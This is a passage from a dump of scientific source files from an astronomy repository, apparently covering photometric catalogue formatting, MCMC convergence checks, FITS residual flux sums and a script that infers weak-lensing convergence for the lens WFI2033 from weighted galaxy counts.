np.mean([data[auto_i_noconv] - data[iso_i],data[auto_r_noconv] - data[iso_r]],axis=0)\n isoauto[np.abs(data[iso_i]) == 99.0] = 0\n isoauto[(np.abs(data[iso_i]) != 99.0) & ((np.abs(data[auto_r_noconv]) == 99.0) | (np.abs(data[iso_r]) == 99.0))] = data[auto_i_noconv][(np.abs(data[iso_i]) != 99.0) & ((np.abs(data[auto_r_noconv]) == 99.0) | (np.abs(data[iso_r]) == 99.0))] - data[iso_i][(np.abs(data[iso_i]) != 99.0) & ((np.abs(data[auto_r_noconv]) == 99.0) | (np.abs(data[iso_r]) == 99.0))]\n data[iso_u][np.abs(data[iso_u]) != 99.0] = data[iso_u][np.abs(data[iso_u]) != 99.0] + isoauto[np.abs(data[iso_u]) != 99.0]\n data[iso_g][np.abs(data[iso_g]) != 99.0] = data[iso_g][np.abs(data[iso_g]) != 99.0] + isoauto[np.abs(data[iso_g]) != 99.0]\n data[iso_r][np.abs(data[iso_r]) != 99.0] = data[iso_r][np.abs(data[iso_r]) != 99.0] + isoauto[np.abs(data[iso_r]) != 99.0]\n data[iso_i][np.abs(data[iso_i]) != 99.0] = data[iso_i][np.abs(data[iso_i]) != 99.0] + isoauto[np.abs(data[iso_i]) != 99.0]\n data[iso_z][np.abs(data[iso_z]) != 99.0] = data[iso_z][np.abs(data[iso_z]) != 99.0] + isoauto[np.abs(data[iso_z]) != 99.0]\n data[iso_Y][np.abs(data[iso_Y]) != 99.0] = data[iso_Y][np.abs(data[iso_Y]) != 99.0] + isoauto[np.abs(data[iso_Y]) != 99.0]\n data[iso_J][np.abs(data[iso_J]) != 99.0] = data[iso_J][np.abs(data[iso_J]) != 99.0] + isoauto[np.abs(data[iso_J]) != 99.0]\n data[iso_H][np.abs(data[iso_H]) != 99.0] = data[iso_H][np.abs(data[iso_H]) != 99.0] + isoauto[np.abs(data[iso_H]) != 99.0]\n data[iso_K][np.abs(data[iso_K]) != 99.0] = data[iso_K][np.abs(data[iso_K]) != 99.0] + isoauto[np.abs(data[iso_K]) != 99.0]\n\nfileout = file[:-4] + \"_forbpz_NEW.cat\"\n\nif \"detect_i_and_ir\" in 
file:\n str = \"X_IMAGE Y_IMAGE X_WORLD Y_WORLD MAG_AUTO_i_noconv_detect_i MAG_AUTO_ERR_i_noconv_detect_i FLUX_RADIUS_i_noconv_detect_i FLAG_i_noconv_detect_i #ID u u_err g g_err r r_err i i_err z z_err Y Y_err J J_err H H_err K K_err\"\n dataout = np.c_[data[xpix],data[ypix],data[xwcs],data[ywcs],data[auto_i_noconv_detecti],data[auto_i_noconv_detecti_err],data[flx_rad],data[flg],data[id],data[iso_u],data[iso_u_err],data[iso_g],data[iso_g_err],data[iso_r],data[iso_r_err],data[iso_i],data[iso_i_err],data[iso_z],data[iso_z_err],data[iso_Y],data[iso_Y_err],data[iso_J],data[iso_J_err],data[iso_H],data[iso_H_err],data[iso_K],data[iso_K_err]]\n np.savetxt(fileout,dataout,header=str,fmt='%.4f \\t %.4f \\t %.9f \\t %.9f \\t %.2f \\t %.2f \\t %.3f \\t %d \\t %d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\nelse:\n str = \"X_IMAGE Y_IMAGE X_WORLD Y_WORLD MAG_AUTO_i_noconv MAG_AUTO_ERR_i_noconv FLUX_RADIUS_i_noconv FLAG #ID u u_err g g_err r r_err i i_err z z_err Y Y_err J J_err H H_err K K_err\"\n dataout = np.c_[data[xpix],data[ypix],data[xwcs],data[ywcs],data[auto_i_noconv],data[auto_i_noconv_err],data[flx_rad],data[flg],data[id],data[iso_u],data[iso_u_err],data[iso_g],data[iso_g_err],data[iso_r],data[iso_r_err],data[iso_i],data[iso_i_err],data[iso_z],data[iso_z_err],data[iso_Y],data[iso_Y_err],data[iso_J],data[iso_J_err],data[iso_H],data[iso_H_err],data[iso_K],data[iso_K_err]]\n np.savetxt(fileout,dataout,header=str,fmt='%.4f \\t %.4f \\t %.9f \\t %.9f \\t %.2f \\t %.2f \\t %.3f \\t %d \\t %d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "e7605a9114c29fce199fa8963a6e30344fb2edfb", "content_id": "a98c5e301c0f638488108638db6ff5c3b69bc614", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium4.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_3_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.590709924697876, "alphanum_fraction": 0.6067776679992676, "avg_line_length": 36.46067428588867, "blob_id": "74280fac55778acfbe47bc8a6a562cbbbda839c9", "content_id": "b61ab3489b529efd9c42ee8e900d7afd2e932b6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3423, "license_type": "no_license", "max_line_length": 124, "num_lines": 89, "path": 
"/python/modeling_utilities/mcmc_combinechains.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a list of MCMC chains, do corner plots and assess convergence\r\n# run as python mcmc_multipleprogression.py frac file1 [file2] [...]\r\n# Above, \"frac\" is the fraction of the chain length at which burn-in ends\r\n\r\nimport sys\r\nimport numpy as np\r\nimport pylab as plt\r\nimport corner\r\n\r\nfrac = float(sys.argv[1])\r\nchains = len(sys.argv) - 2\r\nfiles = sys.argv\r\nprint \"Using %s chains...\" % chains\r\n\r\nlist = []\r\nfor i in range(chains):#10\r\n mcmc = np.loadtxt(sys.argv[2+i],unpack=True)\r\n mcmci = mcmc[1:,int(np.shape(mcmc)[1]*frac):np.shape(mcmc)[1]]\r\n # eliminate the first column, containing chi^2, and the burn-in\r\n if i == 0:\r\n mcmcfinal = mcmci\r\n minsize = np.shape(mcmci)[1]\r\n else:\r\n mcmcfinal = np.append(mcmcfinal,mcmci, axis = 1)\r\n minsize = np.min([np.shape(mcmci)[1],minsize])\r\n list += [mcmci]\r\n\r\n\r\n# Convergence diagnostics with Gelman-Rubin 1995 R_hat\r\ndef R_hat(samples): # https://groups.google.com/forum/#!topic/hddm-users/qWzCWTz-wFQ\r\n# formulae in https://pymc-devs.github.io/pymc/modelchecking.html\r\n m, n = np.shape(samples) # m = chains, n = samples\r\n # Chain variance\r\n chain_var = np.var(samples, axis=1, ddof=1) # degrees of freedom = n-ddof\r\n # Within-chain variance (mean of variances of each chain)\r\n W = 1./m * np.sum(chain_var)\r\n # Chain means\r\n chain_means = np.mean(samples, axis=1)\r\n # mean_of_means = numpy.mean(chain_means) # all chains have same length\r\n # Variance of chain means\r\n chain_means_var = np.var(chain_means, ddof=1)\r\n # Between-chain variance\r\n B = n * chain_means_var\r\n # Weighted average of within and between variance\r\n #(marginal posterior variance)\r\n Var_hat = (float(n-1)/n)*W + B/n\r\n # Potential scale reduction factor\r\n R_hat = np.sqrt(Var_hat / W)\r\n return R_hat\r\n\r\nfor i in range(np.shape(mcmci)[0]):\r\n for j in range(chains):\r\n if j == 0: samples = list[0][i][:minsize]\r\n else: samples = np.vstack((samples,list[j][i][:minsize]))\r\n print \"[%d] R_hat = \" %(i+1), R_hat(samples)\r\n\r\nfigure = corner.corner(mcmcfinal[0:np.shape(mcmcfinal)[0]].T, labels=np.linspace(1,np.shape(mcmcfinal)[0],\\\r\nnp.shape(mcmcfinal)[0]).astype(int).tolist(),quantiles=[0.16, 0.5, 0.84],show_titles=True, title_kwargs={\"fontsize\": 12})\r\n\r\n# program to find the stem of given list of words function to find the stem (longest common substring) from the string array\r\n# This code is contributed by ita_c (https://www.geeksforgeeks.org/longest-common-substring-array-strings/)\r\ndef findstem(arr):\r\n # Determine size of the array\r\n n = len(arr)\r\n # Take first word from array\r\n # as reference\r\n s = arr[0]\r\n l = len(s)\r\n res = \"\"\r\n for i in range( l) :\r\n for j in range( i + 1, l + 1) :\r\n # generating all possible substrings\r\n # of our reference string arr[0] i.e s\r\n stem = s[i:j]\r\n k = 1\r\n for k in range(1, n):\r\n # Check if the generated stem is\r\n # common to all words\r\n if stem not in arr[k]:\r\n break\r\n # If current substring is present in\r\n # all strings and its length is greater\r\n # than current result\r\n if (k + 1 == n and len(res) < len(stem)):\r\n res = stem\r\n return res\r\n\r\nstems = findstem(files[2:])\r\nfigure.savefig(\"%smcmc.png\" % stems, dpi=100)\r\n" }, { "alpha_fraction": 0.7688356041908264, "alphanum_fraction": 0.7945205569267273, "avg_line_length": 47.66666793823242, "blob_id": 
"fe7818d85b68716e72a6a43330b757639717e618", "content_id": "8edb7557385150ad14630b4e85150e30678e729b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 584, "license_type": "no_license", "max_line_length": 281, "num_lines": 12, "path": "/python/image_utilities/fluxinresiduals.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a mask marking the object footprint and a residual image, adds up the flux in the residuals\n# Run as python /Users/cerusu/GITHUB/zMstarPDF/python/image_utilities/fluxinresiduals.py /Users/cerusu/Dropbox/Glikman/analysis/msk_visit1A.fits /Users/cerusu/Dropbox/Glikman/analysis/network/125_1sers4/out_lens1pertpointextendedoriginalpsfmskarc_iter30pymc_1imagonly_subtract.fits\n\nimport numpy as np\nfrom astropy.io import fits\nimport sys\n\nmask = fits.open(str(sys.argv[1]))\nmask = mask[0].data\nresid = fits.open(str(sys.argv[2]))\nresid = resid[0].data\nprint np.sum(resid[mask==1])\n" }, { "alpha_fraction": 0.6045043468475342, "alphanum_fraction": 0.6525391340255737, "avg_line_length": 75.36122131347656, "blob_id": "ab2083cd821b0a2d8ad8c53514882e93238cf7a7", "content_id": "d6a64bfcf8cb9fccfc0aeb06c0384c3cfa6d29de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 57500, "license_type": "no_license", "max_line_length": 761, "num_lines": 753, "path": "/python/catalogue_utilities/inferkappa_unbiasedwithshearincrement2224.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Run as python inferkappa_unbiasedwithshear.py WFI2033 5 45 23 meds gal gamma oneoverr mass\n# Description of arguments: inferkappa_unbiasedwithshear.py lens radius maglim innermask sum/meds gal list_of_weight_constraints\n# weight1 should always be \"gal\", in order to use the galaxy counts when correcting the bias due to different LOS\n# the code is written such that, if shear is used as overdensity, it should be the second weight used (unless only one weight is used);\n\nimport sys\nimport os\nfrom os import system\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport time\n\nstart_time=time.time()\n\nlens = str(sys.argv[1])\ninnermask = str(sys.argv[2])\nradius = str(sys.argv[3])\nmag = str(sys.argv[4])\nmode = str(sys.argv[5])\nconjoined = len(sys.argv) - 6 # total number of arguments including code name, minus the number of ones that are not weights\n\nif conjoined == 1:\n weightin1 = str(sys.argv[6])\nif conjoined == 2:\n weightin1 = str(sys.argv[6])\n weightin2 = str(sys.argv[7])\nif conjoined == 3:\n weightin1 = str(sys.argv[6])\n weightin2 = str(sys.argv[7])\n weightin3 = str(sys.argv[8])\nif conjoined == 4:\n weightin1 = str(sys.argv[6])\n weightin2 = str(sys.argv[7])\n weightin3 = str(sys.argv[8])\n weightin4 = str(sys.argv[9])\n\nprint \"conjoined:\", conjoined\nroot = \"/mfst01a/rusucs/WFI2033/MSwghtratios/\"\nrootout = \"/mfst01a/rusucs/WFI2033/MSkapparesults/\"\nweightsfile = np.loadtxt(root+'weightedcounts_%s_%s_%sarcsec.lst' % (lens,mode,str(innermask)),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\nlimsigma = 2 # sigma limits on either side of the assumed gaussians\nbin_stat = 2000\nmin_kappa = -0.10\nmax_kappa = 1\n\nincrement1 = 2 # refers to the E interval from Greene et al. 
2014\nincrement2 = 2\nincrement3 = 2\nincrement4 = 4\n\nif lens == \"WFI2033\":\n constr_gamma = 0.16\n constrwidth_gamma_inf = 0.14\n constrwidth_gamma_sup = 0.18\n filters = \"ugrizJHK\"\n\nif mag == \"23\" and radius == \"45\":\n measured_index = 0 # specifies the column index in weightsfile\n measured_index_inf = 1\n measured_index_sup = 2\nif mag == \"23\" and radius == \"120\":\n measured_index = 3\n measured_index_inf = 4\n measured_index_sup = 5\n\nif mag == \"23\":\n if weightin1 == \"gal\": weight1_index = 4\n if weightin1 == \"z\": weight1_index = 5\n if weightin1 == \"mass\": weight1_index = 6\n if weightin1 == \"mass2\": weight1_index = 7\n if weightin1 == \"mass3\": weight1_index = 8\n if weightin1 == \"oneoverr\": weight1_index = 9\n if weightin1 == \"zoverr\": weight1_index = 10\n if weightin1 == \"massoverr\": weight1_index = 11\n if weightin1 == \"mass2overr\": weight1_index = 12\n if weightin1 == \"mass3overr\": weight1_index = 13\n if weightin1 == \"mass2rms\": weight1_index = 14\n if weightin1 == \"mass3rms\": weight1_index = 15\n if weightin1 == \"mass2overrrms\": weight1_index = 16\n if weightin1 == \"mass3overrrms\": weight1_index = 17\n if weightin1 == \"flexion\": weight1_index = 18\n if weightin1 == \"tidal\": weight1_index = 19\n if weightin1 == \"SIS\": weight1_index = 20\n if weightin1 == \"SIShalo\": weight1_index = 21\nif conjoined >= 2:\n if mag == \"23\":\n if weightin2 == \"gal\": weight2_index = 4\n if weightin2 == \"z\": weight2_index = 5\n if weightin2 == \"mass\": weight2_index = 6\n if weightin2 == \"mass2\": weight2_index = 7\n if weightin2 == \"mass3\": weight2_index = 8\n if weightin2 == \"oneoverr\": weight2_index = 9\n if weightin2 == \"zoverr\": weight2_index = 10\n if weightin2 == \"massoverr\": weight2_index = 11\n if weightin2 == \"mass2overr\": weight2_index = 12\n if weightin2 == \"mass3overr\": weight2_index = 13\n if weightin2 == \"mass2rms\": weight2_index = 14\n if weightin2 == \"mass3rms\": weight2_index = 15\n if weightin2 == \"mass2overrrms\": weight2_index = 16\n if weightin2 == \"mass3overrrms\": weight2_index = 17\n if weightin2 == \"flexion\": weight2_index = 18\n if weightin2 == \"tidal\": weight2_index = 19\n if weightin2 == \"SIS\": weight2_index = 20\n if weightin2 == \"SIShalo\": weight2_index = 21\n if conjoined >= 3:\n if mag == \"23\":\n if weightin3 == \"gal\": weight3_index = 4\n if weightin3 == \"z\": weight3_index = 5\n if weightin3 == \"mass\": weight3_index = 6\n if weightin3 == \"mass2\": weight3_index = 7\n if weightin3 == \"mass3\": weight3_index = 8\n if weightin3 == \"oneoverr\": weight3_index = 9\n if weightin3 == \"zoverr\": weight3_index = 10\n if weightin3 == \"massoverr\": weight3_index = 11\n if weightin3 == \"mass2overr\": weight3_index = 12\n if weightin3 == \"mass3overr\": weight3_index = 13\n if weightin3 == \"mass2rms\": weight3_index = 14\n if weightin3 == \"mass3rms\": weight3_index = 15\n if weightin3 == \"mass2overrrms\": weight3_index = 16\n if weightin3 == \"mass3overrrms\": weight3_index = 17\n if weightin3 == \"flexion\": weight3_index = 18\n if weightin3 == \"tidal\": weight3_index = 19\n if weightin3 == \"SIS\": weight3_index = 20\n if weightin3 == \"SIShalo\": weight3_index = 21\n if conjoined == 4:\n if mag == \"23\":\n if weightin4 == \"gal\": weight4_index = 4\n if weightin4 == \"z\": weight4_index = 5\n if weightin4 == \"mass\": weight4_index = 6\n if weightin4 == \"mass2\": weight4_index = 7\n if weightin4 == \"mass3\": weight4_index = 8\n if weightin4 == \"oneoverr\": weight4_index 
= 9\n if weightin4 == \"zoverr\": weight4_index = 10\n if weightin4 == \"massoverr\": weight4_index = 11\n if weightin4 == \"mass2overr\": weight4_index = 12\n if weightin4 == \"mass3overr\": weight4_index = 13\n if weightin4 == \"mass2rms\": weight4_index = 14\n if weightin4 == \"mass3rms\": weight4_index = 15\n if weightin4 == \"mass2overrrms\": weight4_index = 16\n if weightin4 == \"mass3overrrms\": weight4_index = 17\n if weightin4 == \"flexion\": weight4_index = 18\n if weightin4 == \"tidal\": weight4_index = 19\n if weightin4 == \"SIS\": weight4_index = 20\n if weightin4 == \"SIShalo\": weight4_index = 21\n\nconstr_gal_meds = weightsfile[measured_index][0]\nconstrwidth_gal_meds_inf = weightsfile[measured_index_inf][0]\nconstrwidth_gal_meds_sup = weightsfile[measured_index_sup][0]\n\nconstr_z_meds = weightsfile[measured_index][1]\nconstrwidth_z_meds_inf = weightsfile[measured_index_inf][1]\nconstrwidth_z_meds_sup = weightsfile[measured_index_sup][1]\n\nconstr_mass_meds = weightsfile[measured_index][2]\nconstrwidth_mass_meds_inf = weightsfile[measured_index_inf][2]\nconstrwidth_mass_meds_sup = weightsfile[measured_index_sup][2]\n\nconstr_mass2_meds = weightsfile[measured_index][3]\nconstrwidth_mass2_meds_inf = weightsfile[measured_index_inf][3]\nconstrwidth_mass2_meds_sup = weightsfile[measured_index_sup][3]\n\nconstr_mass3_meds = weightsfile[measured_index][4]\nconstrwidth_mass3_meds_inf = weightsfile[measured_index_inf][4]\nconstrwidth_mass3_meds_sup = weightsfile[measured_index_sup][4]\n\nconstr_oneoverr_meds = weightsfile[measured_index][5]\nconstrwidth_oneoverr_meds_inf = weightsfile[measured_index_inf][5]\nconstrwidth_oneoverr_meds_sup = weightsfile[measured_index_sup][5]\n\nconstr_zoverr_meds = weightsfile[measured_index][6]\nconstrwidth_zoverr_meds_inf = weightsfile[measured_index_inf][6]\nconstrwidth_zoverr_meds_sup = weightsfile[measured_index_sup][6]\n\nconstr_massoverr_meds = weightsfile[measured_index][7]\nconstrwidth_massoverr_meds_inf = weightsfile[measured_index_inf][7]\nconstrwidth_massoverr_meds_sup = weightsfile[measured_index_sup][7]\n\nconstr_mass2overr_meds = weightsfile[measured_index][8]\nconstrwidth_mass2overr_meds_inf = weightsfile[measured_index_inf][8]\nconstrwidth_mass2overr_meds_sup = weightsfile[measured_index_sup][8]\n\nconstr_mass3overr_meds = weightsfile[measured_index][9]\nconstrwidth_mass3overr_meds_inf = weightsfile[measured_index_inf][9]\nconstrwidth_mass3overr_meds_sup = weightsfile[measured_index_sup][9]\n\nconstr_mass2rms_meds = weightsfile[measured_index][10]\nconstrwidth_mass2rms_meds_inf = weightsfile[measured_index_inf][10]\nconstrwidth_mass2rms_meds_sup = weightsfile[measured_index_sup][10]\n\nconstr_mass3rms_meds = weightsfile[measured_index][11]\nconstrwidth_mass3rms_meds_inf = weightsfile[measured_index_inf][11]\nconstrwidth_mass3rms_meds_sup = weightsfile[measured_index_sup][11]\n\nconstr_mass2overrrms_meds = weightsfile[measured_index][12]\nconstrwidth_mass2overrrms_meds_inf = weightsfile[measured_index_inf][12]\nconstrwidth_mass2overrrms_meds_sup = weightsfile[measured_index_sup][12]\n\nconstr_mass3overrrms_meds = weightsfile[measured_index][13]\nconstrwidth_mass3overrrms_meds_inf = weightsfile[measured_index_inf][13]\nconstrwidth_mass3overrrms_meds_sup = weightsfile[measured_index_sup][13]\n\nconstr_flexion_meds = weightsfile[measured_index][14]\nconstrwidth_flexion_meds_inf = weightsfile[measured_index_inf][14]\nconstrwidth_flexion_meds_sup = weightsfile[measured_index_sup][14]\n\nconstr_tidal_meds = 
weightsfile[measured_index][15]\nconstrwidth_tidal_meds_inf = weightsfile[measured_index_inf][15]\nconstrwidth_tidal_meds_sup = weightsfile[measured_index_sup][15]\n\nconstr_SIS_meds = weightsfile[measured_index][16]\nconstrwidth_SIS_meds_inf = weightsfile[measured_index_inf][16]\nconstrwidth_SIS_meds_sup = weightsfile[measured_index_sup][16]\n\nconstr_SIShalo_meds = weightsfile[measured_index][17]\nconstrwidth_SIShalo_meds_inf = weightsfile[measured_index_inf][17]\nconstrwidth_SIShalo_meds_sup = weightsfile[measured_index_sup][17]\n\nif conjoined == 4:\n if weightin4 == \"gal\": constr_weight4 = constr_gal_meds; constrwidth_weight4_inf = constrwidth_gal_meds_inf; constrwidth_weight4_sup = constrwidth_gal_meds_sup\n if weightin4 == \"z\": constr_weight4 = constr_z_meds; constrwidth_weight4_inf = constrwidth_z_meds_inf; constrwidth_weight4_sup = constrwidth_z_meds_sup\n if weightin4 == \"mass\": constr_weight4 = constr_mass_meds; constrwidth_weight4_inf = constrwidth_mass_meds_inf; constrwidth_weight4_sup = constrwidth_mass_meds_sup\n if weightin4 == \"mass2\": constr_weight4 = constr_mass2_meds; constrwidth_weight4_inf = constrwidth_mass2_meds_inf; constrwidth_weight4_sup = constrwidth_mass2_meds_sup\n if weightin4 == \"mass3\": constr_weight4 = constr_mass3_meds; constrwidth_weight4_inf = constrwidth_mass3_meds_inf; constrwidth_weight4_sup = constrwidth_mass3_meds_sup\n if weightin4 == \"oneoverr\": constr_weight4 = constr_oneoverr_meds; constrwidth_weight4_inf = constrwidth_oneoverr_meds_inf; constrwidth_weight4_sup = constrwidth_oneoverr_meds_sup\n if weightin4 == \"zoverr\": constr_weight4 = constr_zoverr_meds; constrwidth_weight4_inf = constrwidth_zoverr_meds_inf; constrwidth_weight4_sup = constrwidth_zoverr_meds_sup\n if weightin4 == \"massoverr\": constr_weight4 = constr_massoverr_meds; constrwidth_weight4_inf = constrwidth_massoverr_meds_inf; constrwidth_weight4_sup = constrwidth_massoverr_meds_sup\n if weightin4 == \"mass2overr\": constr_weight4 = constr_mass2overr_meds; constrwidth_weight4_inf = constrwidth_mass2overr_meds_inf; constrwidth_weight4_sup = constrwidth_mass2overr_meds_sup\n if weightin4 == \"mass3overr\": constr_weight4 = constr_mass3overr_meds; constrwidth_weight4_inf = constrwidth_mass3overr_meds_inf; constrwidth_weight4_sup = constrwidth_mass3overr_meds_sup\n if weightin4 == \"mass2rms\": constr_weight4 = constr_mass2rms_meds; constrwidth_weight4_inf = constrwidth_mass2rms_meds_inf; constrwidth_weight4_sup = constrwidth_mass2rms_meds_sup\n if weightin4 == \"mass3rms\": constr_weight4 = constr_mass3rms_meds; constrwidth_weight4_inf = constrwidth_mass3rms_meds_inf; constrwidth_weight4_sup = constrwidth_mass3rms_meds_sup\n if weightin4 == \"mass2overrrms\": constr_weight4 = constr_mass2overrrms_meds; constrwidth_weight4_inf = constrwidth_mass2overrrms_meds_inf; constrwidth_weight4_sup = constrwidth_mass2overrrms_meds_sup\n if weightin4 == \"mass3overrrms\": constr_weight4 = constr_mass3overrrms_meds; constrwidth_weight4_inf = constrwidth_mass3overrrms_meds_inf; constrwidth_weight4_sup = constrwidth_mass3overrrms_meds_sup\n if weightin4 == \"flexion\": constr_weight4 = constr_flexion_meds; constrwidth_weight4_inf = constrwidth_flexion_meds_inf; constrwidth_weight4_sup = constrwidth_flexion_meds_sup\n if weightin4 == \"tidal\": constr_weight4 = constr_tidal_meds; constrwidth_weight4_inf = constrwidth_tidal_meds_inf; constrwidth_weight4_sup = constrwidth_tidal_meds_sup\n if weightin4 == \"SIS\": constr_weight4 = constr_SIS_meds; constrwidth_weight4_inf = 
constrwidth_SIS_meds_inf; constrwidth_weight4_sup = constrwidth_SIS_meds_sup\n if weightin4 == \"SIShalo\": constr_weight4 = constr_SIShalo_meds; constrwidth_weight4_inf = constrwidth_SIShalo_meds_inf; constrwidth_weight4_sup = constrwidth_SIShalo_meds_sup\n if weightin4 == \"gamma\": constr_weight4 = constr_gamma; constrwidth_weight4_inf = constrwidth_gamma_inf; constrwidth_weight4_sup = constrwidth_gamma_sup\n\nif (conjoined == 3) | (conjoined == 4):\n if weightin3 == \"gal\": constr_weight3 = constr_gal_meds; constrwidth_weight3_inf = constrwidth_gal_meds_inf; constrwidth_weight3_sup = constrwidth_gal_meds_sup\n if weightin3 == \"z\": constr_weight3 = constr_z_meds; constrwidth_weight3_inf = constrwidth_z_meds_inf; constrwidth_weight3_sup = constrwidth_z_meds_sup\n if weightin3 == \"mass\": constr_weight3 = constr_mass_meds; constrwidth_weight3_inf = constrwidth_mass_meds_inf; constrwidth_weight3_sup = constrwidth_mass_meds_sup\n if weightin3 == \"mass2\": constr_weight3 = constr_mass2_meds; constrwidth_weight3_inf = constrwidth_mass2_meds_inf; constrwidth_weight3_sup = constrwidth_mass2_meds_sup\n if weightin3 == \"mass3\": constr_weight3 = constr_mass3_meds; constrwidth_weight3_inf = constrwidth_mass3_meds_inf; constrwidth_weight3_sup = constrwidth_mass3_meds_sup\n if weightin3 == \"oneoverr\": constr_weight3 = constr_oneoverr_meds; constrwidth_weight3_inf = constrwidth_oneoverr_meds_inf; constrwidth_weight3_sup = constrwidth_oneoverr_meds_sup\n if weightin3 == \"zoverr\": constr_weight3 = constr_zoverr_meds; constrwidth_weight3_inf = constrwidth_zoverr_meds_inf; constrwidth_weight3_sup = constrwidth_zoverr_meds_sup\n if weightin3 == \"massoverr\": constr_weight3 = constr_massoverr_meds; constrwidth_weight3_inf = constrwidth_massoverr_meds_inf; constrwidth_weight3_sup = constrwidth_massoverr_meds_sup\n if weightin3 == \"mass2overr\": constr_weight3 = constr_mass2overr_meds; constrwidth_weight3_inf = constrwidth_mass2overr_meds_inf; constrwidth_weight3_sup = constrwidth_mass2overr_meds_sup\n if weightin3 == \"mass3overr\": constr_weight3 = constr_mass3overr_meds; constrwidth_weight3_inf = constrwidth_mass3overr_meds_inf; constrwidth_weight3_sup = constrwidth_mass3overr_meds_sup\n if weightin3 == \"mass2rms\": constr_weight3 = constr_mass2rms_meds; constrwidth_weight3_inf = constrwidth_mass2rms_meds_inf; constrwidth_weight3_sup = constrwidth_mass2rms_meds_sup\n if weightin3 == \"mass3rms\": constr_weight3 = constr_mass3rms_meds; constrwidth_weight3_inf = constrwidth_mass3rms_meds_inf; constrwidth_weight3_sup = constrwidth_mass3rms_meds_sup\n if weightin3 == \"mass2overrrms\": constr_weight3 = constr_mass2overrrms_meds; constrwidth_weight3_inf = constrwidth_mass2overrrms_meds_inf; constrwidth_weight3_sup = constrwidth_mass2overrrms_meds_sup\n if weightin3 == \"mass3overrrms\": constr_weight3 = constr_mass3overrrms_meds; constrwidth_weight3_inf = constrwidth_mass3overrrms_meds_inf; constrwidth_weight3_sup = constrwidth_mass3overrrms_meds_sup\n if weightin3 == \"flexion\": constr_weight3 = constr_flexion_meds; constrwidth_weight3_inf = constrwidth_flexion_meds_inf; constrwidth_weight3_sup = constrwidth_flexion_meds_sup\n if weightin3 == \"tidal\": constr_weight3 = constr_tidal_meds; constrwidth_weight3_inf = constrwidth_tidal_meds_inf; constrwidth_weight3_sup = constrwidth_tidal_meds_sup\n if weightin3 == \"SIS\": constr_weight3 = constr_SIS_meds; constrwidth_weight3_inf = constrwidth_SIS_meds_inf; constrwidth_weight3_sup = constrwidth_SIS_meds_sup\n if weightin3 == \"SIShalo\": 
constr_weight3 = constr_SIShalo_meds; constrwidth_weight3_inf = constrwidth_SIShalo_meds_inf; constrwidth_weight3_sup = constrwidth_SIShalo_meds_sup\n if weightin3 == \"gamma\": constr_weight3 = constr_gamma; constrwidth_weight3_inf = constrwidth_gamma_inf; constrwidth_weight3_sup = constrwidth_gamma_sup\n\nif (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n if weightin2 == \"gal\": constr_weight2 = constr_gal_meds; constrwidth_weight2_inf = constrwidth_gal_meds_inf; constrwidth_weight2_sup = constrwidth_gal_meds_sup\n if weightin2 == \"z\": constr_weight2 = constr_z_meds; constrwidth_weight2_inf = constrwidth_z_meds_inf; constrwidth_weight2_sup = constrwidth_z_meds_sup\n if weightin2 == \"mass\": constr_weight2 = constr_mass_meds; constrwidth_weight2_inf = constrwidth_mass_meds_inf; constrwidth_weight2_sup = constrwidth_mass_meds_sup\n if weightin2 == \"mass2\": constr_weight2 = constr_mass2_meds; constrwidth_weight2_inf = constrwidth_mass2_meds_inf; constrwidth_weight2_sup = constrwidth_mass2_meds_sup\n if weightin2 == \"mass3\": constr_weight2 = constr_mass3_meds; constrwidth_weight2_inf = constrwidth_mass3_meds_inf; constrwidth_weight2_sup = constrwidth_mass3_meds_sup\n if weightin2 == \"oneoverr\": constr_weight2 = constr_oneoverr_meds; constrwidth_weight2_inf = constrwidth_oneoverr_meds_inf; constrwidth_weight2_sup = constrwidth_oneoverr_meds_sup\n if weightin2 == \"zoverr\": constr_weight2 = constr_zoverr_meds; constrwidth_weight2_inf = constrwidth_zoverr_meds_inf; constrwidth_weight2_sup = constrwidth_zoverr_meds_sup\n if weightin2 == \"massoverr\": constr_weight2 = constr_massoverr_meds; constrwidth_weight2_inf = constrwidth_massoverr_meds_inf; constrwidth_weight2_sup = constrwidth_massoverr_meds_sup\n if weightin2 == \"mass2overr\": constr_weight2 = constr_mass2overr_meds; constrwidth_weight2_inf = 